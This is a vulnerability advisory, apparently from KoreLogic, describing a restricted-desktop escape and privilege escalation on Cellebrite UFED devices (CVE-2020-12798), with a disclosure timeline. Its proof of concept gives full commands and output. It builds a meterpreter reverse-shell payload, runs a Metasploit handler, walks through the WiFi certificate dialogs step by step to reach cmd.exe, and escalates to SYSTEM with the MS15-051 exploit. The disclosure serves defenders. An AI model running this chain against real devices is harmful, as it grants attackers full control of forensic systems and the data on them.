Cellebrite UFED Desktop Escape / Privilege Escalation

Type packetstorm
Reporter Matthew Bergin
Modified 2020-05-14T00:00:00


                                            `KL-001-2020-002 : Cellebrite Restricted Desktop Escape and Escalation of User Privilege  
Title: Cellebrite Restricted Desktop Escape and Escalation of User Privilege  
Advisory ID: KL-001-2020-002  
Publication Date: 2020.05.14  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt  
1. Vulnerability Details  
Affected Vendor: Cellebrite  
Affected Product: UFED  
Affected Version: 5.0 -  
Platform: Embedded Windows  
CWE Classification: CWE-269: Improper Privilege Management,  
CWE-20: Input Validation Error  
CVE ID: CVE-2020-12798  
2. Vulnerability Description  
Cellebrite UFED device implements local operating system  
policies that can be circumvented to obtain a command  
prompt. From there privilege escalation is possible using  
public exploits.  
3. Technical Description  
The Cellebrite UFED device implements local operating system  
policies which are designed to limit access to operating system  
functionality. These include but may not be limited to:  
1. Preventing access to dialog such as Run, File Browser,  
and Explorer.  
2. Preventing access to process and application management tools  
such as Task Manager and the Control Panel.  
These policies can be circumvented by using functionality  
that is permitted by the policy governing the use of the user  
desktop. A user can leverage the Wireless Network connection  
string to select certificate based authentication, which then  
enables file dialogs that are able to be used to launch a  
command prompt. Following this, privileges can be elevated  
using off the shelf and publicly available exploits relevant  
to the specific Windows version in use.  
4. Mitigation and Remediation Recommendation  
The vendor has informed KoreLogic that this vulnerability is  
not present on devices manufactured "at least since 2018." The  
vendor was uncertain of the exact version number that remediated  
this attack vector.  
5. Credit  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
6. Disclosure Timeline  
2020.03.05 - KoreLogic submits vulnerability details to  
2020.03.17 - Cellebrite acknowledges receipt and the intention  
to investigate.  
2020.04.16 - KoreLogic requests an update on the status of the  
vulnerability report.  
2020.04.19 - Cellebrite responds, notifying KoreLogic that the  
vulnerable dialog is not available on newer UFED  
releases. Indicates they will determine when the  
remediation was introduced.  
2020.05.04 - KoreLogic requests an update from Cellebrite.  
2020.05.05 - Cellebrite responds that they do not have the  
version number at hand, but does not request  
delaying public disclosure.  
2020.05.11 - MITRE issues CVE-2020-12798.  
2020.05.12 - 45 business-days have elapsed since the report was  
submitted to Cellebrite.  
2020.05.14 - KoreLogic public disclosure.  
7. Proof of Concept  
Begin by using the msfvenom binary to create a meterpreter  
payload that will initiate a remote connection to a C2. Copy  
the payload to a USB drive. Following this, use the msfconsole  
binary to create a C2 connection handler with the multi/handler  
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
[-] No arch selected, selecting arch: x86 from the payload  
No encoder or badchars specified, outputting raw payload  
Payload size: 341 bytes  
Final size of exe file: 73802 bytes  
Saved as: payload.exe  
$ sudo mount -o rw /dev/sda1 a/  
$ sudo cp payload.exe a/  
$ sync  
$ sudo umount a/  
$ msfconsole  
msf5 exploit(multi/handler) > show options  
Module options (exploit/multi/handler):  
Name Current Setting Required Description  
---- --------------- -------- -----------  
Payload options (windows/meterpreter/reverse_tcp):  
Name Current Setting Required Description  
---- --------------- -------- -----------  
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)  
LHOST [REDACTED] yes The listen address (an interface may be specified)  
LPORT 8888 yes The listen port  
Exploit target:  
Id Name  
-- ----  
0 Wildcard Target  
msf5 exploit(multi/handler) > exploit -j -z  
[*] Exploit running as background job 1.  
[*] Exploit completed, but no session was created.  
[*] Started reverse TCP handler on [REDACTED]:8888  
Now insert the USB drive where payload.exe resides into a  
target Cellebrite device. Next, follow the steps below:  
1. Open the Wireless Network Connection screen by clicking  
on the WiFi icon in the bottom right hand corner of the  
screen. This should be next to the system clock.  
2. Select "Change advanced settings" -- this will bring up a  
screen called Windows Network Connection Properties. Choose  
the Wireless Networks tab.  
3. Under the Preferred networks section, click the Add button  
and then select the Authentication tab. Make sure "Enable IEEE  
802.1x authentication for this network" is enabled.  
4. Under EAP Type, select "Smart Card or other Certificate"  
and then click the Properties button.  
5. Under Trusted Root Certificate Authorities click the  
View Certificate button. This will bring up a screen called  
Certificate, choose the Details tab and click the "Copy to  
File" button. This will bring up a screen called Certificate  
Export Wizard.  
6. Click Next and select any of the available export format  
options. For example, choose the "DER encoded binary X.509"  
option and click next.  
7. Instead of typing out a export path click the Browse  
button to open a file dialog. In the "File Name" box type:  
\WINDOWS\System32\ and under "Save as type" select the "All  
Files (*.*)" option. Hit the enter key.  
8. Locate the cmd.exe file then drag and drop any DLL over  
it. For example, choose the clusapi.dll file located near the  
cmd.exe executable. This will open a Command Prompt screen as  
an unprivileged user.  
9. Type the drive letter to change into the USB drive containing  
the payload.exe file.  
This results in a connection back into Metasploit.  
[*] Sending stage (180291 bytes) to [REDACTED]  
[*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800  
msf5 exploit(multi/handler) > sessions -i 2  
[*] Starting interaction with 2...  
meterpreter > getuid  
Server username: TOUCH-[REDACTED]\Operator  
An exploit for CVE-2015-1701 is loaded up and configured to run  
a local privilege escalation exploit against the unprivileged  
session and SYSTEM is obtained.  
msf5 exploit(windows/local/ms15_051_client_copy_image) > show options  
Module options (exploit/windows/local/ms15_051_client_copy_image):  
Name Current Setting Required Description  
---- --------------- -------- -----------  
SESSION yes The session to run this module on.  
Exploit target:  
Id Name  
-- ----  
0 Windows x86  
msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2  
SESSION => 2  
msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp  
PAYLOAD => windows/meterpreter/reverse_tcp  
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888  
LPORT => 8888  
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED]  
msf5 exploit(windows/local/ms15_051_client_copy_image) > run  
[*] Started reverse TCP handler on [REDACTED]:8888  
[*] Launching notepad to host the exploit...  
[+] Process 3936 launched.  
[*] Reflectively injecting the exploit DLL into 3936...  
[*] Injecting exploit into 3936...  
[*] Exploit injected. Injecting payload into 3936...  
[*] Payload injected. Executing exploit...  
[*] Sending stage (180291 bytes) to [REDACTED]  
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.  
[*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800  
meterpreter > getuid  
Server username: NT AUTHORITY\SYSTEM  
meterpreter >  
The contents of this advisory are copyright(c) 2020  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
Our public vulnerability disclosure policy is available at: